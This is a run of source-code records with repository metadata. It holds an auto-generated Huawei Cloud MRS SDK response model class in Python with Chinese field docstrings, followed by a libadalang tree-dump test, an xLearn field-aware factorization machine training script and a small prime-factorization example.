self._return_code = None
self._is_public = None
self._is_protected = None
self._group_id = None
self._jar_path = None
self._input = None
self._output = None
self._job_log = None
self._job_type = None
self._file_action = None
self._arguments = None
self._hql = None
self._job_state = None
self._job_final_status = None
self._hive_script_path = None
self._create_by = None
self._finished_step = None
self._job_main_id = None
self._job_step_id = None
self._postpone_at = None
self._step_name = None
self._step_num = None
self._task_num = None
self._update_by = None
self._credentials = None
self._user_id = None
self._job_configs = None
self._extra = None
self._data_source_urls = None
self._info = None
self.discriminator = None
if templated is not None:
self.templated = templated
if created_at is not None:
self.created_at = created_at
if updated_at is not None:
self.updated_at = updated_at
if id is not None:
self.id = id
if tenant_id is not None:
self.tenant_id = tenant_id
if job_id is not None:
self.job_id = job_id
if job_name is not None:
self.job_name = job_name
if input_id is not None:
self.input_id = input_id
if output_id is not None:
self.output_id = output_id
if start_time is not None:
self.start_time = start_time
if end_time is not None:
self.end_time = end_time
if cluster_id is not None:
self.cluster_id = cluster_id
if engine_job_id is not None:
self.engine_job_id = engine_job_id
if return_code is not None:
self.return_code = return_code
if is_public is not None:
self.is_public = is_public
if is_protected is not None:
self.is_protected = is_protected
if group_id is not None:
self.group_id = group_id
if jar_path is not None:
self.jar_path = jar_path
if input is not None:
self.input = input
if output is not None:
self.output = output
if job_log is not None:
self.job_log = job_log
if job_type is not None:
self.job_type = job_type
if file_action is not None:
self.file_action = file_action
if arguments is not None:
self.arguments = arguments
if hql is not None:
self.hql = hql
if job_state is not None:
self.job_state = job_state
if job_final_status is not None:
self.job_final_status = job_final_status
if hive_script_path is not None:
self.hive_script_path = hive_script_path
if create_by is not None:
self.create_by = create_by
if finished_step is not None:
self.finished_step = finished_step
if job_main_id is not None:
self.job_main_id = job_main_id
if job_step_id is not None:
self.job_step_id = job_step_id
if postpone_at is not None:
self.postpone_at = postpone_at
if step_name is not None:
self.step_name = step_name
if step_num is not None:
self.step_num = step_num
if task_num is not None:
self.task_num = task_num
if update_by is not None:
self.update_by = update_by
if credentials is not None:
self.credentials = credentials
if user_id is not None:
self.user_id = user_id
if job_configs is not None:
self.job_configs = job_configs
if extra is not None:
self.extra = extra
if data_source_urls is not None:
self.data_source_urls = data_source_urls
if info is not None:
self.info = info
@property
def templated(self):
"""Gets the templated of this CreateAndExecuteJobResponse.
作业执行对象是否由作业模板生成。
:return: The templated of this CreateAndExecuteJobResponse.
:rtype: bool
"""
return self._templated
@templated.setter
def templated(self, templated):
"""Sets the templated of this CreateAndExecuteJobResponse.
作业执行对象是否由作业模板生成。
:param templated: The templated of this CreateAndExecuteJobResponse.
:type templated: bool
"""
self._templated = templated
@property
def created_at(self):
"""Gets the created_at of this CreateAndExecuteJobResponse.
作业创建时间,十位时间戳。
:return: The created_at of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._created_at
@created_at.setter
def created_at(self, created_at):
"""Sets the created_at of this CreateAndExecuteJobResponse.
作业创建时间,十位时间戳。
:param created_at: The created_at of this CreateAndExecuteJobResponse.
:type created_at: int
"""
self._created_at = created_at
@property
def updated_at(self):
"""Gets the updated_at of this CreateAndExecuteJobResponse.
作业更新时间,十位时间戳。
:return: The updated_at of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._updated_at
@updated_at.setter
def updated_at(self, updated_at):
"""Sets the updated_at of this CreateAndExecuteJobResponse.
作业更新时间,十位时间戳。
:param updated_at: The updated_at of this CreateAndExecuteJobResponse.
:type updated_at: int
"""
self._updated_at = updated_at
@property
def id(self):
"""Gets the id of this CreateAndExecuteJobResponse.
作业ID。
:return: The id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this CreateAndExecuteJobResponse.
作业ID。
:param id: The id of this CreateAndExecuteJobResponse.
:type id: str
"""
self._id = id
@property
def tenant_id(self):
"""Gets the tenant_id of this CreateAndExecuteJobResponse.
项目编号。获取方法,请参见[获取项目ID](https://support.huaweicloud.com/api-mrs/mrs_02_0011.html)。
:return: The tenant_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._tenant_id
@tenant_id.setter
def tenant_id(self, tenant_id):
"""Sets the tenant_id of this CreateAndExecuteJobResponse.
项目编号。获取方法,请参见[获取项目ID](https://support.huaweicloud.com/api-mrs/mrs_02_0011.html)。
:param tenant_id: The tenant_id of this CreateAndExecuteJobResponse.
:type tenant_id: str
"""
self._tenant_id = tenant_id
@property
def job_id(self):
"""Gets the job_id of this CreateAndExecuteJobResponse.
作业应用ID。
:return: The job_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this CreateAndExecuteJobResponse.
作业应用ID。
:param job_id: The job_id of this CreateAndExecuteJobResponse.
:type job_id: str
"""
self._job_id = job_id
@property
def job_name(self):
"""Gets the job_name of this CreateAndExecuteJobResponse.
作业名称,只能由字母、数字、中划线和下划线组成,并且长度为1~64个字符。 说明: 不同作业的名称允许相同,但不建议设置相同。
:return: The job_name of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_name
@job_name.setter
def job_name(self, job_name):
"""Sets the job_name of this CreateAndExecuteJobResponse.
作业名称,只能由字母、数字、中划线和下划线组成,并且长度为1~64个字符。 说明: 不同作业的名称允许相同,但不建议设置相同。
:param job_name: The job_name of this CreateAndExecuteJobResponse.
:type job_name: str
"""
self._job_name = job_name
@property
def input_id(self):
"""Gets the input_id of this CreateAndExecuteJobResponse.
数据输入ID。
:return: The input_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._input_id
@input_id.setter
def input_id(self, input_id):
"""Sets the input_id of this CreateAndExecuteJobResponse.
数据输入ID。
:param input_id: The input_id of this CreateAndExecuteJobResponse.
:type input_id: str
"""
self._input_id = input_id
@property
def output_id(self):
"""Gets the output_id of this CreateAndExecuteJobResponse.
数据输出ID。
:return: The output_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._output_id
@output_id.setter
def output_id(self, output_id):
"""Sets the output_id of this CreateAndExecuteJobResponse.
数据输出ID。
:param output_id: The output_id of this CreateAndExecuteJobResponse.
:type output_id: str
"""
self._output_id = output_id
@property
def start_time(self):
"""Gets the start_time of this CreateAndExecuteJobResponse.
作业执行开始时间,十位时间戳。
:return: The start_time of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._start_time
@start_time.setter
def start_time(self, start_time):
"""Sets the start_time of this CreateAndExecuteJobResponse.
作业执行开始时间,十位时间戳。
:param start_time: The start_time of this CreateAndExecuteJobResponse.
:type start_time: int
"""
self._start_time = start_time
@property
def end_time(self):
"""Gets the end_time of this CreateAndExecuteJobResponse.
作业执行结束时间,十位时间戳。
:return: The end_time of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._end_time
@end_time.setter
def end_time(self, end_time):
"""Sets the end_time of this CreateAndExecuteJobResponse.
作业执行结束时间,十位时间戳。
:param end_time: The end_time of this CreateAndExecuteJobResponse.
:type end_time: int
"""
self._end_time = end_time
@property
def cluster_id(self):
"""Gets the cluster_id of this CreateAndExecuteJobResponse.
集群ID。
:return: The cluster_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._cluster_id
@cluster_id.setter
def cluster_id(self, cluster_id):
"""Sets the cluster_id of this CreateAndExecuteJobResponse.
集群ID。
:param cluster_id: The cluster_id of this CreateAndExecuteJobResponse.
:type cluster_id: str
"""
self._cluster_id = cluster_id
@property
def engine_job_id(self):
"""Gets the engine_job_id of this CreateAndExecuteJobResponse.
Oozie工作流ID。
:return: The engine_job_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._engine_job_id
@engine_job_id.setter
def engine_job_id(self, engine_job_id):
"""Sets the engine_job_id of this CreateAndExecuteJobResponse.
Oozie工作流ID。
:param engine_job_id: The engine_job_id of this CreateAndExecuteJobResponse.
:type engine_job_id: str
"""
self._engine_job_id = engine_job_id
@property
def return_code(self):
"""Gets the return_code of this CreateAndExecuteJobResponse.
运行结果返回码。
:return: The return_code of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._return_code
@return_code.setter
def return_code(self, return_code):
"""Sets the return_code of this CreateAndExecuteJobResponse.
运行结果返回码。
:param return_code: The return_code of this CreateAndExecuteJobResponse.
:type return_code: str
"""
self._return_code = return_code
@property
def is_public(self):
"""Gets the is_public of this CreateAndExecuteJobResponse.
是否公开。 当前版本不支持该功能。
:return: The is_public of this CreateAndExecuteJobResponse.
:rtype: bool
"""
return self._is_public
@is_public.setter
def is_public(self, is_public):
"""Sets the is_public of this CreateAndExecuteJobResponse.
是否公开。 当前版本不支持该功能。
:param is_public: The is_public of this CreateAndExecuteJobResponse.
:type is_public: bool
"""
self._is_public = is_public
@property
def is_protected(self):
"""Gets the is_protected of this CreateAndExecuteJobResponse.
是否受保护。 当前版本不支持该功能。
:return: The is_protected of this CreateAndExecuteJobResponse.
:rtype: bool
"""
return self._is_protected
@is_protected.setter
def is_protected(self, is_protected):
"""Sets the is_protected of this CreateAndExecuteJobResponse.
是否受保护。 当前版本不支持该功能。
:param is_protected: The is_protected of this CreateAndExecuteJobResponse.
:type is_protected: bool
"""
self._is_protected = is_protected
@property
def group_id(self):
"""Gets the group_id of this CreateAndExecuteJobResponse.
作业执行组ID。
:return: The group_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._group_id
@group_id.setter
def group_id(self, group_id):
"""Sets the group_id of this CreateAndExecuteJobResponse.
作业执行组ID。
:param group_id: The group_id of this CreateAndExecuteJobResponse.
:type group_id: str
"""
self._group_id = group_id
@property
def jar_path(self):
"""Gets the jar_path of this CreateAndExecuteJobResponse.
执行程序Jar包或sql文件地址,需要满足如下要求: - 最多为1023字符,不能包含;|&><'$特殊字符,且不可为空或全空格。 - 需要以“/”或“s3a://”开头。OBS路径不支持KMS加密的文件或程序。 - Spark Script需要以“.sql”结尾,MapReduce和Spark Jar需要以“.jar”结尾,sql和jar不区分大小写。
:return: The jar_path of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._jar_path
@jar_path.setter
def jar_path(self, jar_path):
"""Sets the jar_path of this CreateAndExecuteJobResponse.
执行程序Jar包或sql文件地址,需要满足如下要求: - 最多为1023字符,不能包含;|&><'$特殊字符,且不可为空或全空格。 - 需要以“/”或“s3a://”开头。OBS路径不支持KMS加密的文件或程序。 - Spark Script需要以“.sql”结尾,MapReduce和Spark Jar需要以“.jar”结尾,sql和jar不区分大小写。
:param jar_path: The jar_path of this CreateAndExecuteJobResponse.
:type jar_path: str
"""
self._jar_path = jar_path
@property
def input(self):
"""Gets the input of this CreateAndExecuteJobResponse.
数据输入地址,必须以“/”或“s3a://”开头。请配置为正确的OBS路径,OBS路径不支持KMS加密的文件或程序。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:return: The input of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._input
@input.setter
def input(self, input):
"""Sets the input of this CreateAndExecuteJobResponse.
数据输入地址,必须以“/”或“s3a://”开头。请配置为正确的OBS路径,OBS路径不支持KMS加密的文件或程序。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:param input: The input of this CreateAndExecuteJobResponse.
:type input: str
"""
self._input = input
@property
def output(self):
"""Gets the output of this CreateAndExecuteJobResponse.
数据输出地址,必须以“/”或“s3a://”开头。请配置为正确的OBS路径,如果该路径不存在,系统会自动创建。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:return: The output of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._output
@output.setter
def output(self, output):
"""Sets the output of this CreateAndExecuteJobResponse.
数据输出地址,必须以“/”或“s3a://”开头。请配置为正确的OBS路径,如果该路径不存在,系统会自动创建。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:param output: The output of this CreateAndExecuteJobResponse.
:type output: str
"""
self._output = output
@property
def job_log(self):
"""Gets the job_log of this CreateAndExecuteJobResponse.
作业日志存储地址,该日志信息记录作业运行状态。必须以“/”或“s3a://”开头,请配置为正确的OBS路径。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:return: The job_log of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_log
@job_log.setter
def job_log(self, job_log):
"""Sets the job_log of this CreateAndExecuteJobResponse.
作业日志存储地址,该日志信息记录作业运行状态。必须以“/”或“s3a://”开头,请配置为正确的OBS路径。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:param job_log: The job_log of this CreateAndExecuteJobResponse.
:type job_log: str
"""
self._job_log = job_log
@property
def job_type(self):
"""Gets the job_type of this CreateAndExecuteJobResponse.
作业类型码。 - 1:MapReduce - 2:Spark - 3:Hive Script - 4:HiveSQL(当前不支持) - 5:DistCp,导入、导出数据。 - 6:Spark Script - 7:Spark SQL,提交SQL语句,(该接口当前不支持) 说明: 只有包含Spark和Hive组件的集群才能新增Spark和Hive类型的作业。
:return: The job_type of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._job_type
@job_type.setter
def job_type(self, job_type):
"""Sets the job_type of this CreateAndExecuteJobResponse.
作业类型码。 - 1:MapReduce - 2:Spark - 3:Hive Script - 4:HiveSQL(当前不支持) - 5:DistCp,导入、导出数据。 - 6:Spark Script - 7:Spark SQL,提交SQL语句,(该接口当前不支持) 说明: 只有包含Spark和Hive组件的集群才能新增Spark和Hive类型的作业。
:param job_type: The job_type of this CreateAndExecuteJobResponse.
:type job_type: int
"""
self._job_type = job_type
@property
def file_action(self):
"""Gets the file_action of this CreateAndExecuteJobResponse.
文件操作类型,包括: - export:从HDFS导出数据至OBS - import:从OBS导入数据至HDFS
:return: The file_action of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._file_action
@file_action.setter
def file_action(self, file_action):
"""Sets the file_action of this CreateAndExecuteJobResponse.
文件操作类型,包括: - export:从HDFS导出数据至OBS - import:从OBS导入数据至HDFS
:param file_action: The file_action of this CreateAndExecuteJobResponse.
:type file_action: str
"""
self._file_action = file_action
@property
def arguments(self):
"""Gets the arguments of this CreateAndExecuteJobResponse.
程序执行的关键参数,该参数由用户程序内的函数指定,MRS只负责参数的传入。 最多为150000字符,不能包含;|&>'<$!\\\"\\特殊字符,可为空。 说明: 用户输入带有敏感信息(如登录密码)的参数时,可通过在参数名前添加“@”的方式,为该参数值加密,以防止敏感信息被明文形式持久化。在查看作业信息时,敏感信息显示为“*”。 例如:username=admin @password=admin_123
:return: The arguments of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._arguments
@arguments.setter
def arguments(self, arguments):
"""Sets the arguments of this CreateAndExecuteJobResponse.
程序执行的关键参数,该参数由用户程序内的函数指定,MRS只负责参数的传入。 最多为150000字符,不能包含;|&>'<$!\\\"\\特殊字符,可为空。 说明: 用户输入带有敏感信息(如登录密码)的参数时,可通过在参数名前添加“@”的方式,为该参数值加密,以防止敏感信息被明文形式持久化。在查看作业信息时,敏感信息显示为“*”。 例如:username=admin @password=admin_123
:param arguments: The arguments of this CreateAndExecuteJobResponse.
:type arguments: str
"""
self._arguments = arguments
@property
def hql(self):
"""Gets the hql of this CreateAndExecuteJobResponse.
Hive&Spark Sql语句
:return: The hql of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._hql
@hql.setter
def hql(self, hql):
"""Sets the hql of this CreateAndExecuteJobResponse.
Hive&Spark Sql语句
:param hql: The hql of this CreateAndExecuteJobResponse.
:type hql: str
"""
self._hql = hql
@property
def job_state(self):
"""Gets the job_state of this CreateAndExecuteJobResponse.
作业状态码。 - 1:Terminated - 2:Starting - 3:Running - 4:Completed - 5:Abnormal - 6:Error
:return: The job_state of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._job_state
@job_state.setter
def job_state(self, job_state):
"""Sets the job_state of this CreateAndExecuteJobResponse.
作业状态码。 - 1:Terminated - 2:Starting - 3:Running - 4:Completed - 5:Abnormal - 6:Error
:param job_state: The job_state of this CreateAndExecuteJobResponse.
:type job_state: int
"""
self._job_state = job_state
@property
def job_final_status(self):
"""Gets the job_final_status of this CreateAndExecuteJobResponse.
作业最终状态码。 - 0:未完成 - 1:执行错误,终止执行 - 2:执行完成并且成功 - 3:已取消
:return: The job_final_status of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._job_final_status
@job_final_status.setter
def job_final_status(self, job_final_status):
"""Sets the job_final_status of this CreateAndExecuteJobResponse.
作业最终状态码。 - 0:未完成 - 1:执行错误,终止执行 - 2:执行完成并且成功 - 3:已取消
:param job_final_status: The job_final_status of this CreateAndExecuteJobResponse.
:type job_final_status: int
"""
self._job_final_status = job_final_status
@property
def hive_script_path(self):
"""Gets the hive_script_path of this CreateAndExecuteJobResponse.
sql程序路径,仅Spark Script和Hive Script作业需要使用此参数。需要满足如下要求: - 最多为1023字符,不能包含;|&><'$特殊字符,且不可为空或全空格。 - 需要以“/”或“s3a://”开头,OBS路径不支持KMS加密的文件或程序。 - 需要以“.sql”结尾,sql不区分大小写。
:return: The hive_script_path of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._hive_script_path
@hive_script_path.setter
def hive_script_path(self, hive_script_path):
"""Sets the hive_script_path of this CreateAndExecuteJobResponse.
sql程序路径,仅Spark Script和Hive Script作业需要使用此参数。需要满足如下要求: - 最多为1023字符,不能包含;|&><'$特殊字符,且不可为空或全空格。 - 需要以“/”或“s3a://”开头,OBS路径不支持KMS加密的文件或程序。 - 需要以“.sql”结尾,sql不区分大小写。
:param hive_script_path: The hive_script_path of this CreateAndExecuteJobResponse.
:type hive_script_path: str
"""
self._hive_script_path = hive_script_path
@property
def create_by(self):
"""Gets the create_by of this CreateAndExecuteJobResponse.
创建作业的用户ID。 为兼容历史版本,保留此参数。
:return: The create_by of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._create_by
@create_by.setter
def create_by(self, create_by):
"""Sets the create_by of this CreateAndExecuteJobResponse.
创建作业的用户ID。 为兼容历史版本,保留此参数。
:param create_by: The create_by of this CreateAndExecuteJobResponse.
:type create_by: str
"""
self._create_by = create_by
@property
def finished_step(self):
"""Gets the finished_step of this CreateAndExecuteJobResponse.
当前已完成的步骤数。 为兼容历史版本,保留此参数。
:return: The finished_step of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._finished_step
@finished_step.setter
def finished_step(self, finished_step):
"""Sets the finished_step of this CreateAndExecuteJobResponse.
当前已完成的步骤数。 为兼容历史版本,保留此参数。
:param finished_step: The finished_step of this CreateAndExecuteJobResponse.
:type finished_step: int
"""
self._finished_step = finished_step
@property
def job_main_id(self):
"""Gets the job_main_id of this CreateAndExecuteJobResponse.
作业主ID。 为兼容历史版本,保留此参数。
:return: The job_main_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_main_id
@job_main_id.setter
def job_main_id(self, job_main_id):
"""Sets the job_main_id of this CreateAndExecuteJobResponse.
作业主ID。 为兼容历史版本,保留此参数。
:param job_main_id: The job_main_id of this CreateAndExecuteJobResponse.
:type job_main_id: str
"""
self._job_main_id = job_main_id
@property
def job_step_id(self):
"""Gets the job_step_id of this CreateAndExecuteJobResponse.
作业步骤ID。 为兼容历史版本,保留此参数。
:return: The job_step_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_step_id
@job_step_id.setter
def job_step_id(self, job_step_id):
"""Sets the job_step_id of this CreateAndExecuteJobResponse.
作业步骤ID。 为兼容历史版本,保留此参数。
:param job_step_id: The job_step_id of this CreateAndExecuteJobResponse.
:type job_step_id: str
"""
self._job_step_id = job_step_id
@property
def postpone_at(self):
"""Gets the postpone_at of this CreateAndExecuteJobResponse.
延迟时间,十位时间戳。 为兼容历史版本,保留此参数。
:return: The postpone_at of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._postpone_at
@postpone_at.setter
def postpone_at(self, postpone_at):
"""Sets the postpone_at of this CreateAndExecuteJobResponse.
延迟时间,十位时间戳。 为兼容历史版本,保留此参数。
:param postpone_at: The postpone_at of this CreateAndExecuteJobResponse.
:type postpone_at: int
"""
self._postpone_at = postpone_at
@property
def step_name(self):
"""Gets the step_name of this CreateAndExecuteJobResponse.
作业步骤名。 为兼容历史版本,保留此参数。
:return: The step_name of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._step_name
@step_name.setter
def step_name(self, step_name):
"""Sets the step_name of this CreateAndExecuteJobResponse.
作业步骤名。 为兼容历史版本,保留此参数。
:param step_name: The step_name of this CreateAndExecuteJobResponse.
:type step_name: str
"""
self._step_name = step_name
@property
def step_num(self):
"""Gets the step_num of this CreateAndExecuteJobResponse.
步骤数量 为兼容历史版本,保留此参数。
:return: The step_num of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._step_num
@step_num.setter
def step_num(self, step_num):
"""Sets the step_num of this CreateAndExecuteJobResponse.
步骤数量 为兼容历史版本,保留此参数。
:param step_num: The step_num of this CreateAndExecuteJobResponse.
:type step_num: int
"""
self._step_num = step_num
@property
def task_num(self):
"""Gets the task_num of this CreateAndExecuteJobResponse.
任务数量。为兼容历史版本,保留此参数。
:return: The task_num of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._task_num
@task_num.setter
def task_num(self, task_num):
"""Sets the task_num of this CreateAndExecuteJobResponse.
任务数量。为兼容历史版本,保留此参数。
:param task_num: The task_num of this CreateAndExecuteJobResponse.
:type task_num: int
"""
self._task_num = task_num
@property
def update_by(self):
"""Gets the update_by of this CreateAndExecuteJobResponse.
更新作业的用户ID。
:return: The update_by of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._update_by
@update_by.setter
def update_by(self, update_by):
"""Sets the update_by of this CreateAndExecuteJobResponse.
更新作业的用户ID。
:param update_by: The update_by of this CreateAndExecuteJobResponse.
:type update_by: str
"""
self._update_by = update_by
@property
def credentials(self):
"""Gets the credentials of this CreateAndExecuteJobResponse.
令牌,当前版本不支持。
:return: The credentials of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._credentials
@credentials.setter
def credentials(self, credentials):
"""Sets the credentials of this CreateAndExecuteJobResponse.
令牌,当前版本不支持。
:param credentials: The credentials of this CreateAndExecuteJobResponse.
:type credentials: str
"""
self._credentials = credentials
@property
def user_id(self):
"""Gets the user_id of this CreateAndExecuteJobResponse.
创建作业的用户ID。 历史版本兼容,不再使用。
:return: The user_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""Sets the user_id of this CreateAndExecuteJobResponse.
创建作业的用户ID。 历史版本兼容,不再使用。
:param user_id: The user_id of this CreateAndExecuteJobResponse.
:type user_id: str
"""
self._user_id = user_id
@property
def job_configs(self):
"""Gets the job_configs of this CreateAndExecuteJobResponse.
键值对集合,用于保存作业运行配置。
:return: The job_configs of this CreateAndExecuteJobResponse.
:rtype: dict(str, object)
"""
return self._job_configs
@job_configs.setter
def job_configs(self, job_configs):
"""Sets the job_configs of this CreateAndExecuteJobResponse.
键值对集合,用于保存作业运行配置。
:param job_configs: The job_configs of this CreateAndExecuteJobResponse.
:type job_configs: dict(str, object)
"""
self._job_configs = job_configs
@property
def extra(self):
"""Gets the extra of this CreateAndExecuteJobResponse.
认证信息,当前版本不支持。
:return: The extra of this CreateAndExecuteJobResponse.
:rtype: dict(str, object)
"""
return self._extra
@extra.setter
def extra(self, extra):
"""Sets the extra of this CreateAndExecuteJobResponse.
认证信息,当前版本不支持。
:param extra: The extra of this CreateAndExecuteJobResponse.
:type extra: dict(str, object)
"""
self._extra = extra
@property
def data_source_urls(self):
"""Gets the data_source_urls of this CreateAndExecuteJobResponse.
数据源URL。
:return: The data_source_urls of this CreateAndExecuteJobResponse.
:rtype: dict(str, object)
"""
return self._data_source_urls
@data_source_urls.setter
def data_source_urls(self, data_source_urls):
"""Sets the data_source_urls of this CreateAndExecuteJobResponse.
数据源URL。
:param data_source_urls: The data_source_urls of this CreateAndExecuteJobResponse.
:type data_source_urls: dict(str, object)
"""
self._data_source_urls = data_source_urls
@property
def info(self):
"""Gets the info of this CreateAndExecuteJobResponse.
键值对集合,包含oozie返回的作业运行信息。
:return: The info of this CreateAndExecuteJobResponse.
:rtype: dict(str, object)
"""
return self._info
@info.setter
def info(self, info):
"""Sets the info of this CreateAndExecuteJobResponse.
键值对集合,包含oozie返回的作业运行信息。
:param info: The info of this CreateAndExecuteJobResponse.
:type info: dict(str, object)
"""
self._info = info
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreateAndExecuteJobResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
a675336b4dc62a30aa251f219974a12b74203fb7
|
6b6d42eadf53e90b08ce564fb188a9a4b126ef12
|
/testsuite/tests/python/tree_dump/test.py
|
cad1282edb64be39e438e835f88aefe928140e64
|
[
"Apache-2.0",
"LLVM-exception",
"NCSA"
] |
permissive
|
AdaCore/libadalang
|
f97b95d1672cb1e5083c49ee632c6f9c787d36c2
|
50d658afa70ccbf46b8f7d9d43a21d45d56b206c
|
refs/heads/master
| 2023-09-01T18:34:26.976692
| 2023-08-25T15:53:43
| 2023-08-25T15:53:43
| 47,627,172
| 158
| 49
|
Apache-2.0
| 2022-12-14T10:29:45
| 2015-12-08T14:28:22
|
Ada
|
UTF-8
|
Python
| false
| false
| 399
|
py
|
test.py
|
from libadalang import AnalysisContext
def dump(node, indent=0):
indent_str = '| ' * indent
if node is None:
print('{}<null node>'.format(indent_str))
return
print('{}<{}>'.format(indent_str, node.kind_name))
for child in node:
dump(child, indent + 1)
ctx = AnalysisContext('iso-8859-1')
unit = ctx.get_from_file('foo.adb')
dump(unit.root)
print('Done')
|
8641f3ba59a56757c00f78449ad28fc8968c2418
|
855b013907d33b7e1bb74f688e5314b0e9bae510
|
/python-package/test/test_python.py
|
b1c2b76564cef1d20db446b23269a022b3fa2896
|
[
"Apache-2.0"
] |
permissive
|
aksnzhy/xlearn
|
5b3f3aa29b31c7080a3e0835f073d34157878c44
|
4c240aa0aa63c1d105fb9aec583adc2ad2840368
|
refs/heads/master
| 2023-09-01T08:44:21.447056
| 2022-06-05T10:44:18
| 2022-06-05T10:44:18
| 93,925,242
| 3,261
| 624
|
Apache-2.0
| 2023-08-28T05:18:27
| 2017-06-10T08:09:31
|
C++
|
UTF-8
|
Python
| false
| false
| 1,569
|
py
|
test_python.py
|
# Copyright (c) 2018 by contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# This file test the xlearn python package.
# We create a ffm model for binary classification problem.
# The dataset comes from the criteo CTR.
from __future__ import absolute_import
import xlearn as xl
# Training task
ffm_model = xl.create_ffm() # Use field-aware factorization machine
ffm_model.setTrain("./small_train.txt") # Training data
ffm_model.setValidate("./small_test.txt") # Validation data
# param:
# 0. binary classification
# 1. learning rate: 0.2
# 2. regular lambda: 0.002
# 3. evaluation metric: accuracy
param = {'task':'binary', 'lr':0.2,
'lambda':0.002, 'metric':'acc'}
# Start to train
# The trained model will be stored in model.out
ffm_model.fit(param, './model.out')
# Prediction task
ffm_model.setTest("./small_test.txt") # Test data
ffm_model.setSigmoid() # Convert output to 0-1
# Start to predict
# The output result will be stored in output.txt
ffm_model.predict("./model.out", "./output.txt")
|
90489dd4d802c08631cdf6b9aa65be1e55b23e8a
|
a0eb6744e6f7f509b96d21f0bc8b3f8387f6861c
|
/notebook/prime_factorization.py
|
8a473e810e06e0738394a0d04f3fd2f07608aa3e
|
[
"MIT"
] |
permissive
|
nkmk/python-snippets
|
a6c66bdf999502e52f4795a3074ced63bf440817
|
f9dd286a9cf93f474e20371f8fffc4732cb3c4d5
|
refs/heads/master
| 2023-08-03T04:20:05.606293
| 2023-07-26T13:21:11
| 2023-07-26T13:21:11
| 98,900,570
| 253
| 77
|
MIT
| 2020-10-25T01:12:53
| 2017-07-31T14:54:47
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 703
|
py
|
prime_factorization.py
|
import collections
def prime_factorize(n):
a = []
while n % 2 == 0:
a.append(2)
n //= 2
f = 3
while f * f <= n:
if n % f == 0:
a.append(f)
n //= f
else:
f += 2
if n != 1:
a.append(n)
return a
print(prime_factorize(1))
# []
print(prime_factorize(36))
# [2, 2, 3, 3]
print(prime_factorize(840))
# [2, 2, 2, 3, 5, 7]
c = collections.Counter(prime_factorize(840))
print(c)
# Counter({2: 3, 3: 1, 5: 1, 7: 1})
print(c.keys())
# dict_keys([2, 3, 5, 7])
print(c.values())
# dict_values([3, 1, 1, 1])
print(c.items())
# dict_items([(2, 3), (3, 1), (5, 1), (7, 1)])
print(list(c.keys()))
# [2, 3, 5, 7]
|
18114bee0654847097d3f346f019f8085accc5ca
|
2a271a3827527456aaee84c2bc6f365d5d083722
|
